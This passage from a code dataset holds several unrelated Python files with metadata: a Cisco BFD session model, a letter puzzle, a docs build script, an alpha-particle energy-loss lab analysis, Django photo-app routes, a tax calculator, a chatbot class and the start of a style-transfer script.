meta.childNamesAndRnPrefix.append((\"cobra.model.fault.Inst\", \"fault-\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.SessStats\", \"stats\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.PeerV\", \"peerv\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.SessApp\", \"app-\"))\n\n meta.parentClasses.add(\"cobra.model.bfd.Inst\")\n\n meta.rnPrefixes = [\n ('session-', True),\n ]\n\n prop = PropMeta(\"str\", \"asyncPort\", \"asyncPort\", 17003, PropCategory.REGULAR)\n prop.label = \"Async Source Port\"\n prop.isOper = True\n prop.range = [(0, 65535)]\n prop.defaultValue = 0\n prop.defaultValueStr = \"unspecified\"\n prop._addConstant(\"dns\", \"dns\", 53)\n prop._addConstant(\"ftpData\", \"ftp-data\", 20)\n prop._addConstant(\"http\", \"http\", 80)\n prop._addConstant(\"https\", \"https\", 443)\n prop._addConstant(\"pop3\", \"pop3\", 110)\n prop._addConstant(\"rtsp\", \"rtsp\", 554)\n prop._addConstant(\"smtp\", \"smtp\", 25)\n prop._addConstant(\"unspecified\", \"unspecified\", 0)\n meta.props.add(\"asyncPort\", prop)\n\n prop = PropMeta(\"str\", \"authSeqno\", \"authSeqno\", 17021, PropCategory.REGULAR)\n prop.label = \"Authentication Sequence Number\"\n prop.isOper = True\n meta.props.add(\"authSeqno\", prop)\n\n prop = PropMeta(\"str\", \"authType\", \"authType\", 17020, PropCategory.REGULAR)\n prop.label = \"Active value of Auth Type\"\n prop.isOper = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"none\"\n prop._addConstant(\"none\", \"no-authentication\", 0)\n prop._addConstant(\"sha1\", \"keyed-sha1\", 4)\n 
meta.props.add(\"authType\", prop)\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"destAddr\", \"destAddr\", 17011, PropCategory.REGULAR)\n prop.label = \"Destination IP Address\"\n prop.isOper = True\n meta.props.add(\"destAddr\", prop)\n\n prop = PropMeta(\"str\", \"detectMult\", \"detectMult\", 17019, PropCategory.REGULAR)\n prop.label = \"Active value of Detection Multiplier\"\n prop.isOper = True\n prop.range = [(1, 50)]\n prop.defaultValue = 3\n prop.defaultValueStr = \"3\"\n meta.props.add(\"detectMult\", prop)\n\n prop = PropMeta(\"str\", \"diag\", \"diag\", 17024, PropCategory.REGULAR)\n prop.label = \"Protocol Diag\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"administratively-down\", 7)\n prop._addConstant(\"concat-path-down\", \"concatenated-path-down\", 6)\n prop._addConstant(\"detect-timeout\", \"control-detection-time-expired\", 1)\n prop._addConstant(\"echo-fail\", \"echo-function-failed\", 2)\n prop._addConstant(\"fwd-plane-reset\", \"forwarding-plane-reset\", 4)\n prop._addConstant(\"nbr-signal-down\", \"neighbor-signaled-session-down\", 3)\n prop._addConstant(\"none\", \"no-diagnostic\", 0)\n prop._addConstant(\"path-down\", \"path-down\", 5)\n prop._addConstant(\"rev-concat-path-down\", \"reverse-concatenated-path-down\", 8)\n meta.props.add(\"diag\", prop)\n\n prop = PropMeta(\"str\", \"discr\", \"discr\", 17001, PropCategory.REGULAR)\n prop.label = \"Local Session Identifier\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"discr\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"echoPort\", \"echoPort\", 17004, PropCategory.REGULAR)\n prop.label = \"Echo Source Port\"\n prop.isOper = True\n prop.range = [(0, 65535)]\n prop.defaultValue = 0\n prop.defaultValueStr = \"unspecified\"\n prop._addConstant(\"dns\", \"dns\", 53)\n prop._addConstant(\"ftpData\", \"ftp-data\", 20)\n prop._addConstant(\"http\", \"http\", 80)\n prop._addConstant(\"https\", \"https\", 443)\n prop._addConstant(\"pop3\", \"pop3\", 110)\n prop._addConstant(\"rtsp\", \"rtsp\", 554)\n prop._addConstant(\"smtp\", \"smtp\", 25)\n prop._addConstant(\"unspecified\", \"unspecified\", 0)\n meta.props.add(\"echoPort\", prop)\n\n prop = PropMeta(\"str\", \"echoTxIntvl\", \"echoTxIntvl\", 17016, PropCategory.REGULAR)\n prop.label = \"Active Value of Echo Tx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"echoTxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"flags\", \"flags\", 17025, PropCategory.REGULAR)\n prop.label = \"Packet Flags\"\n prop.isOper = True\n prop._addConstant(\"authentication\", \"authentication\", 8)\n prop._addConstant(\"demand\", \"demand\", 1)\n prop._addConstant(\"final\", \"final\", 4)\n prop._addConstant(\"poll\", \"poll\", 2)\n meta.props.add(\"flags\", prop)\n\n prop = PropMeta(\"str\", \"ifId\", \"ifId\", 17007, PropCategory.REGULAR)\n prop.label = \"Interface 
ID\"\n prop.isOper = True\n meta.props.add(\"ifId\", prop)\n\n prop = PropMeta(\"str\", \"iod\", \"iod\", 17008, PropCategory.REGULAR)\n prop.label = \"Interface ordinal\"\n prop.isOper = True\n prop.range = [(1, 4294967295)]\n prop.defaultValue = 1\n prop.defaultValueStr = \"1\"\n meta.props.add(\"iod\", prop)\n\n prop = PropMeta(\"str\", \"lastDiag\", \"lastDiag\", 17027, PropCategory.REGULAR)\n prop.label = \"Last Diag\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"administratively-down\", 7)\n prop._addConstant(\"concat-path-down\", \"concatenated-path-down\", 6)\n prop._addConstant(\"detect-timeout\", \"control-detection-time-expired\", 1)\n prop._addConstant(\"echo-fail\", \"echo-function-failed\", 2)\n prop._addConstant(\"fwd-plane-reset\", \"forwarding-plane-reset\", 4)\n prop._addConstant(\"nbr-signal-down\", \"neighbor-signaled-session-down\", 3)\n prop._addConstant(\"none\", \"no-diagnostic\", 0)\n prop._addConstant(\"path-down\", \"path-down\", 5)\n prop._addConstant(\"rev-concat-path-down\", \"reverse-concatenated-path-down\", 8)\n meta.props.add(\"lastDiag\", prop)\n\n prop = PropMeta(\"str\", \"lastDownTime\", \"lastDownTime\", 17028, PropCategory.REGULAR)\n prop.label = \"Last Down Time\"\n prop.isOper = True\n meta.props.add(\"lastDownTime\", prop)\n\n prop = PropMeta(\"str\", \"lastTransTime\", \"lastTransTime\", 17026, PropCategory.REGULAR)\n prop.label = \"Transition Time\"\n prop.isOper = True\n meta.props.add(\"lastTransTime\", prop)\n\n prop = PropMeta(\"str\", \"localDetectMult\", \"localDetectMult\", 17014, PropCategory.REGULAR)\n prop.label = \"Local value of Detection Multiplier\"\n prop.isOper = True\n prop.range = [(1, 50)]\n prop.defaultValue = 3\n prop.defaultValueStr = \"3\"\n meta.props.add(\"localDetectMult\", prop)\n\n prop = PropMeta(\"str\", \"localMac\", \"localMac\", 17005, PropCategory.REGULAR)\n prop.label = \"Local MAC Address\"\n prop.isOper = True\n meta.props.add(\"localMac\", prop)\n\n prop = PropMeta(\"str\", \"localRxIntvl\", \"localRxIntvl\", 17013, PropCategory.REGULAR)\n prop.label = \"Local Value of Rx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"localRxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"localTxIntvl\", \"localTxIntvl\", 17012, PropCategory.REGULAR)\n prop.label = \"Local Value of Tx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"localTxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"monPolDn\", \"monPolDn\", 17538, PropCategory.REGULAR)\n prop.label = \"Monitoring policy attached to this observable object\"\n prop.isImplicit = True\n prop.isAdmin = True\n meta.props.add(\"monPolDn\", prop)\n\n prop = PropMeta(\"str\", \"operSt\", \"operSt\", 17022, PropCategory.REGULAR)\n prop.label = \"Oper State\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"admindown\", 0)\n prop._addConstant(\"down\", \"down\", 1)\n prop._addConstant(\"init\", \"init\", 2)\n prop._addConstant(\"up\", \"up\", 3)\n meta.props.add(\"operSt\", prop)\n\n prop = PropMeta(\"str\", \"remoteDiscr\", \"remoteDiscr\", 17002, PropCategory.REGULAR)\n prop.label = \"Remote Session 
Identifier\"\n prop.isOper = True\n meta.props.add(\"remoteDiscr\", prop)\n\n prop = PropMeta(\"str\", \"remoteMac\", \"remoteMac\", 17006, PropCategory.REGULAR)\n prop.label = \"Remote MAC Address\"\n prop.isOper = True\n meta.props.add(\"remoteMac\", prop)\n\n prop = PropMeta(\"str\", \"remoteOperSt\", \"remoteOperSt\", 17023, PropCategory.REGULAR)\n prop.label = \"Remote Oper State\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"admindown\", 0)\n prop._addConstant(\"down\", \"down\", 1)\n prop._addConstant(\"init\", \"init\", 2)\n prop._addConstant(\"up\", \"up\", 3)\n meta.props.add(\"remoteOperSt\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"rxIntvl\", \"rxIntvl\", 17017, PropCategory.REGULAR)\n prop.label = \"Active Value of Rx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"rxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"slowIntvl\", \"slowIntvl\", 17018, PropCategory.REGULAR)\n prop.label = \"Active value of Slow Interval\"\n prop.isOper = True\n prop.range = [(1000, 30000)]\n prop.defaultValue = 2000\n prop.defaultValueStr = \"2000\"\n meta.props.add(\"slowIntvl\", prop)\n\n prop = PropMeta(\"str\", \"srcAddr\", \"srcAddr\", 17010, PropCategory.REGULAR)\n prop.label = \"Source IP Address\"\n prop.isOper = True\n meta.props.add(\"srcAddr\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n prop = PropMeta(\"str\", \"txIntvl\", \"txIntvl\", 17015, PropCategory.REGULAR)\n prop.label = \"Active Value of Tx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"txIntvl\", prop)\n\n prop = PropMeta(\"str\", \"vrfName\", \"vrfName\", 17009, PropCategory.REGULAR)\n prop.label = \"L3 Context Name\"\n prop.isOper = True\n prop.range = [(0, 512)]\n meta.props.add(\"vrfName\", prop)\n\n meta.namingProps.append(getattr(meta.props, \"discr\"))\n\n def __init__(self, parentMoOrDn, discr, markDirty=True, **creationProps):\n namingVals = [discr]\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n","sub_path":"venv/Lib/site-packages/cobra/modelimpl/bfd/sess.py","file_name":"sess.py","file_ext":"py","file_size_in_byte":13338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"130913395","text":"import string\n\ns = list(map(str, input()))\ns = list(set(s))\ns.sort()\n\nans = \"\"\narr = []\n\nalp = list(map(str, string.ascii_lowercase))\nfor char in s:\n alp.remove(char)\n\nif len(alp) == 0:\n print(\"None\")\nelse:\n print(alp[0])\n","sub_path":"Python_codes/p03624/s647570177.py","file_name":"s647570177.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"524402602","text":"###############################################################################\n##\n## Copyright (C) 2014 
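The `bfdSess` model above is declarative metadata: `rnFormat = "session-%(discr)s"` together with the `discr` naming prop determines how each instance's relative name is built. A minimal sketch of that substitution, where `topology/pod-1` is a made-up parent DN and the `make_rn` helper is my reading of what the `Mo` base class plausibly does with `namingVals`, not the SDK's actual code:

```python
# Sketch only: expanding an rnFormat template into a relative name (RN)
# and chaining it onto a hypothetical parent DN.
rn_format = "session-%(discr)s"

def make_rn(fmt, **naming_vals):
    # The Mo base class plausibly performs this substitution with the
    # values supplied for meta.namingProps (here: discr).
    return fmt % naming_vals

rn = make_rn(rn_format, discr="16777217")
print(rn)                           # session-16777217
print("topology/pod-1" + "/" + rn)  # topology/pod-1/session-16777217
```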
Tavendo GmbH\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\");\n## you may not use this file except in compliance with the License.\n## You may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n## See the License for the specific language governing permissions and\n## limitations under the License.\n##\n###############################################################################\n\nimport os\nimport json\nimport pkg_resources\n\ntaschenmesser = pkg_resources.resource_filename('taschenmesser', '..')\n#taschenmesser = \"../../../infrequent/taschenmesser\"\nenv = Environment(tools = ['default', 'taschenmesser'],\n toolpath = [taschenmesser],\n ENV = os.environ)\n\n\n##\n## Sphinx Build\n##\nsphinx_docs = env.Command('_build', [], \"sphinx-build -b html . $TARGET\")\nenv.AlwaysBuild(sphinx_docs)\nClean(sphinx_docs, '_build')\n\nuploaded_sphinx = env.s3_dir_uploader('_upload1', '_build', 'autobahn.ws', 'cpp')\nDepends(uploaded_sphinx, sphinx_docs)\n\n\n\n##\n## Doxygen Build\n##\ndoxygen_docs = env.Command('_doxygen', [], \"doxygen Doxyfile\")\nenv.AlwaysBuild(doxygen_docs)\nClean(doxygen_docs, '_doxygen')\n\nuploaded_doxygen = env.s3_dir_uploader('_upload2', '_doxygen/html', 'autobahn.ws', 'cpp/reference')\nDepends(uploaded_doxygen, doxygen_docs)\n\n\n##\n## Targets\n##\nDefault([sphinx_docs, doxygen_docs])\nAlias('upload', [uploaded_sphinx, uploaded_doxygen])\n","sub_path":"doc/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"450902831","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import sem\nfrom uncertainties import ufloat\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nfrom scipy import optimize\nimport uncertainties.unumpy as unp\nimport scipy.constants as const\n\nE_ohne = 5.48556e6 # in MeV siehe altprotokoll\n# ohne Folie\np, ampmax, ampmin = np.genfromtxt('data/messung_c_ohne_folie.csv', delimiter=',', unpack=True)\namp = (ampmax+ampmin)/2\nfamp = np.ones(len(amp))\nfor i in range(len(amp)):\n famp[i] = sem([ampmax[i], ampmin[i]])\n# mit Folie\npf, ampmaxf, ampminf = np.genfromtxt('data/messung_c_gold2mikrometer.csv', delimiter=',', unpack=True)\nampf = (ampmaxf+ampminf)/2\nfampf = np.ones(len(ampf))\nfor i in range(len(ampf)):\n fampf[i] = sem([ampmaxf[i], ampminf[i]])\n\ndef func(x, m, b):\n return m*x+b\n\n# ohne Folie\nprint('========= Ohne Folie =========')\nparams, covariance_matrix = optimize.curve_fit(func, p, amp, sigma=famp, absolute_sigma=True)\nerrors = np.sqrt(np.diag(covariance_matrix))\n\nparam0 = ufloat(params[0], errors[0])\nprint('param0', param0)\nn0 = f'{noms(param0):1.4f}'\ns0 = f'{stds(param0):1.4f}'\ns0 = s0[4:6]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/energieverlust-ohne-folie-m.tex', 'w') as file:\n file.write(r'm_\\text{ohne} &= \\SI{')\n file.write(f'{n0}({s0})')\n file.write(r'}{\\volt\\per\\milli\\bar}')\n\nparam1 = ufloat(params[1], errors[1])\nprint('param1', param1)\nn1 = f'{noms(param1):1.2f}'\ns1 = f'{stds(param1):1.2f}'\ns1 = s1[2:5]\nprint('n1, s1 = b_ohne')\nprint(n1, s1)\nwith open('build/energieverlust-ohne-folie-b.tex', 'w') as file:\n file.write(r'b_\\text{ohne} 
&= \\SI{')\n file.write(f'{n1}({s1})')\n file.write(r'}{\\volt}')\n\n# mit Folie\nprint('========= Mit Folie =========')\nparamsf, covariance_matrixf = optimize.curve_fit(func, pf, ampf, sigma=fampf, absolute_sigma=True)\nerrorsf = np.sqrt(np.diag(covariance_matrixf))\n\nparam0f = ufloat(paramsf[0], errorsf[0])\nprint('param0f', param0f)\nn0f = f'{noms(param0f):1.3f}'\ns0f = f'{stds(param0f):1.3f}'\ns0f = s0f[-1]\nprint('n0f, s0f')\nprint(n0f, s0f)\nwith open('build/energieverlust-mit-folie-m.tex', 'w') as file:\n file.write(r'm_\\text{mit} &= \\SI{')\n file.write(f'{n0f}({s0f})')\n file.write(r'}{\\volt\\per\\milli\\bar}')\n\nparam1f = ufloat(paramsf[1], errorsf[1])\nprint('param1f', param1f)\nn1f = f'{noms(param1f):1.2f}'\ns1f = f'{stds(param1f):1.2f}'\ns1f = s1f[2:4]\nprint('n1f, s1f = b_mit')\nprint(n1f, s1f)\nwith open('build/energieverlust-mit-folie-b.tex', 'w') as file:\n file.write(r'b_\\text{mit} &= \\SI{')\n file.write(f'{n1f}({s1f})')\n file.write(r'}{\\volt}')\n\n# weitere Rechnungen\nprint('========= Geschwindigkeit =========')\ndeltaE = E_ohne*(1 - (param1f / param1))\nE_mit = E_ohne*(param1f / param1)\nprint(\"E_mit: \", E_mit)\nprint('ΔE', deltaE)\nndE = f'{noms(deltaE):7.0f}'\nsdE = f'{stds(deltaE):6.0f}'\n#sdE = sdE[-1]\nprint('ndE, sdE')\nprint(ndE, sdE)\nwith open('build/energieverlust-delta-e.tex', 'w') as file:\n file.write(r'\\laplace E &= \\SI{1.6(3)e6}{\\electronvolt}')\nmalpha = const.value(u'alpha particle mass energy equivalent in MeV')\nmalpha *= 10**6\nprint('malpha', malpha)\nv = unp.sqrt(E_ohne/malpha * (1 + (param1f/ param1)))\nprint('v', v)\nnv = f'{noms(v):1.4f}'\nsv = f'{stds(v):1.4f}'[-1]\nprint('nv, sv')\nprint(nv, sv)\nwith open('build/energieverlust-v.tex', 'w') as file:\n file.write(r'v_α &= (\\num{')\n file.write(f'{nv}({sv})')\n file.write(r'})\\symup{c}')\nv *= const.speed_of_light\nprint('v', v)\nwith open('build/energieverlust-c.tex', 'w') as file:\n file.write(r'v_α &= \\SI{1.506(24)e7}{\\meter\\per\\second}')\n# oben\nprint('========= Bethe-Bloch =========')\nu = const.value(u'atomic mass constant')\nion = 1.265719530432*10**(-16) # joule\nrho = 19.3*10**3 #kg/m**3\nZ_Au = 79\nA = 197\n# N_Au = (Z_Au*rho) / (A*u)\noben = deltaE*const.m_e*(v**2)*4*const.pi*const.epsilon_0**2*A*u\nunten = 4*const.e**4*Z_Au*rho*unp.log((2*const.m_e*(v**2))/(ion))*6.242e18\nprint('oben', oben)\nprint('unten', unten)\ndeltax = oben/unten\nprint('Δx', deltax)\nprint('E_mit/deltax', E_mit/deltax)\nwith open('build/energieverlust-deltax.tex', 'w') as file:\n file.write(r'\\laplace x &= \\SI{')\n file.write(r'3.5(7)e-6')\n file.write(r'}{\\meter}')\nwith open('build/energieverlust-konstanten.tex', 'w') as file:\n # ΔE\n file.write(r'\\laplace E &= \\SI{1.56(17)e6}{\\electronvolt} \\\\')\n file.write('\\n')\n # m_e\n file.write(r'm_\\text{e} &= \\SI{')\n file.write(f'{const.m_e}')\n file.write(r'}{\\kilo\\gram} \\\\')\n file.write('\\n')\n # epsilon_0\n file.write(r'ε_0 &= \\SI{')\n file.write(f'{const.epsilon_0}')\n file.write(r'}{\\ampere\\second\\per\\volt\\per\\meter} \\\\')\n file.write('\\n')\n # A\n file.write(r'A &= \\num{197} \\\\')\n file.write('\\n')\n # u\n file.write(r'u &= \\SI{')\n file.write(f'{u}')\n file.write(r'}{\\kilo\\gram} \\\\')\n file.write('\\n')\n # z\n file.write(r'z &= \\num{2} \\\\')\n file.write('\\n')\n # e\n file.write(r'\\symup{e} &= \\SI{')\n file.write(f'{const.e}')\n file.write(r'}{\\coulomb} \\\\')\n file.write('\\n')\n # Z\n file.write(r'Z &= \\num{79} \\\\')\n file.write('\\n')\n # ρ\n file.write(r'\\rho &= 
\\SI{19.3e3}{\\kilo\\gram\\per\\cubic\\meter} \\\\')\n file.write('\\n')\n # I\n file.write(r'I &= \\SI{')\n file.write(f'{ion}')\n file.write(r'}{\\joule}')\n file.write('\\n')\n\n# Plots\npx = np.linspace(0.02, 300)\nplt.plot(px, func(px, *params), 'r-', label='Ausgleichsgerade ohne Folie')\nplt.errorbar(p, amp, yerr=famp, fmt='bx', label='Messwerte ohne Folie', linewidth=1)\nplt.plot(px, func(px, *paramsf), 'k-', label='Ausgleichsgerade mit Folie')\nplt.errorbar(pf, ampf, yerr=fampf, fmt='gx', label=r'Messwerte mit $\\SI{2}{\\micro\\meter}$ Goldfolie', elinewidth=1)\nplt.grid()\nplt.legend()\nplt.xscale('log')\nplt.xlim(0.02, 300)\nplt.ylim(0.6, 4.7)\nplt.xlabel(r'$p\\:/\\:\\si{\\milli\\bar}$')\nplt.ylabel(r'$U\\:/\\:\\si{\\volt}$')\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\nplt.savefig('build/energieverlust.pdf')\nplt.clf()\n\nplt.plot(px, func(px, *params), 'r-', label='Ausgleichsgerade ohne Folie')\nplt.errorbar(p, amp, yerr=famp, fmt='bx', label='Messwerte ohne Folie', linewidth=1)\nplt.plot(px, func(px, *paramsf), 'k-', label='Ausgleichsgerade mit Folie')\nplt.errorbar(pf, ampf, yerr=fampf, fmt='gx', label=r'Messwerte mit $\\SI{2}{\\micro\\meter}$ Goldfolie', elinewidth=1)\nplt.grid()\nplt.legend()\nplt.xlim(0.02, 300)\nplt.ylim(0.6, 4.7)\nplt.xlabel(r'$p\\:/\\:\\si{\\milli\\bar}$')\nplt.ylabel(r'$U\\:/\\:\\si{\\volt}$')\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\nplt.savefig('build/energieverlust_linear.pdf')\nplt.clf()\n\nnp.savetxt('build/energieverlust-ohne-folie.csv',\n np.column_stack([p, ampmax, ampmin, amp, famp]),\n delimiter='&', fmt='%3.2f, %1.2f, %1.2f, %1.2f, %0.2f',\n header='p, ampmax, ampmin, amp, famp')\nnp.savetxt('build/energieverlust-mit-folie.csv',\n np.column_stack([pf, ampmaxf, ampminf, ampf, fampf]),\n delimiter='&', fmt='%3.2f, %1.3f, %1.3f, %1.3f, %0.3f',\n header='pf, ampmaxf, ampminf, ampf, fampf')\n\n# bethe bloch in luft:\nAluft = 14 # fuer stickstoff\nzluft = 2\nZ_luft = 7\nE = E_ohne\nv_luft = unp.sqrt(2*E/malpha)*const.speed_of_light\nrho_luft = 1.2041 # bei 25 grad celsius\nI_luft = 10*7*const.e\nzaehler = deltaE*const.m_e*(v_luft**2)*4*np.pi*const.epsilon_0**2*Aluft*u\nnenner = zluft**2*const.e**4*Z_luft*rho_luft*unp.log((2*const.m_e*(v_luft**2))/(I_luft))*6.242e18\ndeltax_L = zaehler / nenner\nprint('E_mit/deltax_L', E_mit/deltax_L, '\\n')\nprint(\"ALuft: \", Aluft)\nprint(\"zluft: \", zluft)\nprint(\"v alpha, luft: \", v_luft)\nprint(\"rho_luft: \", rho_luft)\nprint(\"ZLuft: \", Z_luft)\nprint(\"Ion_luft\", I_luft)\nprint(\"zaehler: \", zaehler)\nprint(\"nenner; \", nenner)\nprint(\"deltax L: \", deltax_L)\n","sub_path":"v16-rutherford/python-skripts/energieverlust.py","file_name":"energieverlust.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426589025","text":"\"\"\"config URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
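The analysis script above leans on one pattern throughout: fit with `scipy.optimize.curve_fit(..., sigma=..., absolute_sigma=True)`, then wrap each parameter as a `ufloat` so later algebra (like `param1f / param1`) carries the fit error automatically. A self-contained sketch of that pattern on invented data (the line y = 2x + 1 and the 0.3 error bars are made up for illustration):

```python
import numpy as np
from scipy import optimize
from uncertainties import ufloat

def line(x, m, b):
    return m * x + b

# Synthetic data: y = 2x + 1 with known per-point errors.
rng = np.random.default_rng(0)
x = np.linspace(0, 10, 20)
yerr = np.full_like(x, 0.3)
y = 2 * x + 1 + rng.normal(0, 0.3, x.size)

params, cov = optimize.curve_fit(line, x, y, sigma=yerr, absolute_sigma=True)
errors = np.sqrt(np.diag(cov))

# Wrap parameters as ufloats so arithmetic propagates the uncertainty,
# exactly as the script does with param0/param1.
m = ufloat(params[0], errors[0])
b = ufloat(params[1], errors[1])
print(m, b)       # e.g. 2.00+/-0.01  1.0+/-0.1
print(m * 5 + b)  # prediction with propagated error
```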
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom .views import PhotoCreate, PhotoDelete, PhotoDetail, PhotoList, PhotoUpdate, PhotoLike, PhotoFavorite\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\napp_name = 'photo'\n\nurlpatterns = [\n path(\"create/\", PhotoCreate.as_view(), name = 'create'),\n path(\"like/\", PhotoLike.as_view(), name = 'like'),\n path(\"favorite/\", PhotoFavorite.as_view(), name = 'favorite'),\n path(\"update//\", PhotoUpdate.as_view(), name = 'update'),\n path(\"delete//\", PhotoDelete.as_view(), name = 'delete'),\n path(\"detail//\", PhotoDetail.as_view(), name = 'detail'),\n path(\"\", PhotoList.as_view(), name = 'index'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"photo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"32908599","text":"#Stephen Barton Jr\r\n#Python Programming, tax report\r\n#22 APR 2019\r\n\r\ndef main():\r\n tsales = float(input(\"Enter the total sales for the month: \"))\r\n tax(tsales)\r\n\r\ndef tax(tsales):\r\n county = tsales * .02\r\n state = tsales * .04\r\n print(\"The county tax is: \",format(county, '.2f'))\r\n print(\"The state tax is: \",format(state, '.2f'))\r\n totaltax = county + state\r\n print(\"The total sales tax is: \",format(totaltax, '.2f'))\r\n\r\nmain()\r\n","sub_path":"Python/functions/taxreport.py","file_name":"taxreport.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"652573961","text":"from data import Scenario1, Scenario2\nfrom classes.scenario import Scenario\nfrom classes.action_cli import ActionCLI\nfrom classes.action_http import ActionHTTP\n\nclass Bot(object):\n\n START_BOT = 'Bot> %s'\n\n \"\"\" Class for the Bot will initiate scenarii\"\"\"\n\n def __init__(self, mode='cli'):\n self.first_input = input('Me> ')\n self.mode = mode\n self.inputs = []\n #select the mode of answers\n if mode == 'http':\n self.object_mode = ActionHTTP()\n else:\n self.object_mode = ActionCLI()\n self.intention_detector()\n\n def intention_detector(self):\n '''\n check the first input of the user and choose the right scenario\n OR use _fallback\n '''\n if 'hello' in self.first_input.lower():\n Scenario(self, Scenario1)\n elif 'hi' in self.first_input.lower():\n Scenario(self, Scenario2)\n else:\n self._fallback()\n\n def get_new_message(self):\n '''\n ask new input to the user\n '''\n new_input = input('Me>')\n self.inputs.append(new_input)\n return new_input\n\n def _fallback(self):\n print('Sorry')\n\n def action_switcher(self, type, data):\n '''\n choose which type of action for answer\n '''\n {\n 'text': self.object_mode.output_message,\n 'image': self.object_mode.output_image\n }.get(type)(data)\n","sub_path":"classes/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435143514","text":"import base64\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom io import BytesIO\n\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport 